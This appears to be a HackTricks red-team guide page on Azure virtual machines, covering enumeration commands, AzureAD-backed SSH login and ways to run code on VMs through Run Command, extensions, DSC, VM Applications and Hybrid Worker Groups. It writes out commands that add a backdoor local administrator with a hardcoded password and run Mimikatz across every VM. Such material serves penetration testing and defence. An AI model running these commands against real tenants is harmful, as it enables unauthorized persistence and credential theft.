{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
From the docs: Azure virtual machines are one of several types of on-demand, scalable computing resources that Azure offers. Typically, you choose a virtual machine when you need more control over the computing environment than the other choices offer. This article gives you information about what you should consider before you create a virtual machine, how you create it, and how you manage it.
Azure networks contains different entities and ways to configure it. You can find a brief descriptions, examples and enumeration commands of the different Azure network entities in:
{% content-ref url="az-azure-network.md" %} az-azure-network.md {% endcontent-ref %}
Azure Bastion offers a secure, fully managed RDP (Remote Desktop Protocol) and SSH (Secure Shell) access solution over SSL through the Azure portal. It's integrated within an Azure Virtual Network, allowing RDP and SSH connectivity to VMs using private IPs, avoiding the need for public IPs. This makes it a safer, more convenient alternative to traditional methods involving public IP assignments and NSG rule configurations for VM access. Developers and IT personnel can securely access VMs from the Azure portal using their web browsers, streamlining the process for development and testing environments.
To list all Azure Bastion Hosts in your subscription, you can use the following command:
{% code overflow="wrap" %}
az network bastion list --query "[].{name:name, resourceGroup:resourceGrou, location:location}" -o table
{% endcode %}
# Get readable VMs
Get-AzVM | fl
# Lis running VMs
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | fl *
Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | select -ExpandProperty NetworkProfile
# Get iface and IP address
Get-AzNetworkInterface -Name <interface_name>
Get-AzPublicIpAddress -Name <iface_public_ip_id>
#Get installed extensions
Get-AzVMExtension -ResourceGroupName <res_group_name> -VMName <name>
Get-AzVM | select -ExpandProperty NetworkProfile # Get name of network connector of VM
Get-AzNetworkInterface -Name <name> # Get info of network connector (like IP)
It's possible to allow access to users authenticated via AzureAD. For example trying to access a linux VM: ssh [email protected]@1.1.1.1
(it's important to use the email with the azurecorp used when trying to login) you could get an error like:
{% code overflow="wrap" %}
([email protected]@1.1.1.1) This preview capability is not for production use. When you sign in, verify the name of the app on the sign-in screen is "Azure Linux VM Sign-in" and the IP address of the target VM is correct.
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code DT4PNSTGR to authenticate. Press ENTER when ready.
{% endcode %}
Just follow those instructions going to https://microsoft.com/devicelogin and indicating the code, use the email and password as credentials and you will be able to connect via SSH (if that user has enough permissions to do so: Virtual Machine Administrator Login
or Virtual Machine User Login
role).
# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
Invoke-AzVMRunCommand -ScriptPath .\adduser.ps1 -CommandId 'RunPowerShellScript' -VMName 'juastavm' -ResourceGroupName 'Research' –Verbose
## Another way
Invoke-AzureRmVMRunCommand -ScriptPath .\adduser.ps1 -CommandId 'RunPowerShellScript' -VMName 'juastavm' -ResourceGroupName 'Research' –Verbose
# Content of the script
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
New-LocalUser -Name new_user -Password $passwd
Add-LocalGroupMember -Group Administrators -Member new_user
# Try to run in every machine
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
Azure virtual machine (VM) extensions are small applications that provide post-deployment configuration and automation tasks on Azure VMs. For example, if a virtual machine requires software installation, antivirus protection, or the ability to run a script inside it, you can use a VM extension.
Therefore, if you have access to write it, you can execute arbitrary code:
# Microsoft.Compute/virtualMachines/extensions/write
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add"}'
DesiredConfigurationState (DSC) is a PowerShell tool similar to Ansible, used for setting up a host through code. DSC integrates with Azure, allowing the upload of specific configuration files. These files must adhere to a strict syntax. Notably, the DSC extension in Azure can execute commands from files that meet certain formatting criteria, even if the syntax is not correct for DSC standards, as shown in the provided figure.
The execution of these commands is facilitated by the Publish-AzVMDscConfiguration
function in Az PowerShell. The requirements include a .PS1 file with a defined function and the file must be zipped into a .zip file. Even though the syntax might not be accurate for DSC, the code will still execute. However, the extension will mark the execution status as "failure," and no output from the command will be visible due to the status being overwritten by the failure message.
VM Application Definitions allow for the repeatable deployment of versioned applications to an Azure VM. This resource supports the deployment and update of applications across VMs. To set this up, several steps are required, involving commands like New-AzGalleryApplication
and New-AzGalleryApplicationVersion
in Az PowerShell.
The execution of applications or commands through this method involves the "VMAppExtension", which is installed automatically when an application is applied to a VM. The extension retrieves the file from the specified URI and names it exactly as the application, without an extension. To execute the file correctly, the "ManageActions" field in the REST API call must be configured to rename the file with the appropriate extension. The setup of this method, once complete, will resemble the structure shown in the provided figure.
However, this method of execution is relatively slow, taking about 3-4 minutes to execute an application or command. The files related to this process are stored in specific directories (C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.4\Downloads\
for the application copy and C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.4\Status\
for the execution status).
Both techniques provide unique ways of executing commands and deploying applications in Azure environments, each with its own set of requirements, steps, and considerations.
Hybrid Worker Groups (HWGs) are a feature in Azure that allow Runbooks, configured in an Automation Account, to be executed on an Azure Virtual Machine (VM) that is part of the designated HWG. This execution is facilitated through an extension installed on the VM, which deploys the Runbook code onto the VM. A significant aspect of this process is that the actual credentials are not a factor in execution because the code runs with elevated privileges, specifically as SYSTEM or root, as illustrated in the provided figure.
A crucial detail for those utilizing Windows 10 VMs is the necessity to specify the PowerShell version for the Runbook. It should be set to run as PowerShell Version 5.1 instead of 7.1. This requirement stems from the fact that PowerShell 7.1 is not installed by default on these VMs, leading to a failure in script execution if version 7.1 is specified.
This feature of Azure offers a robust method for automating and managing tasks across hybrid environments, allowing for centralized management and execution of tasks on Azure VMs.
- https://learn.microsoft.com/en-us/azure/virtual-machines/overview
- https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.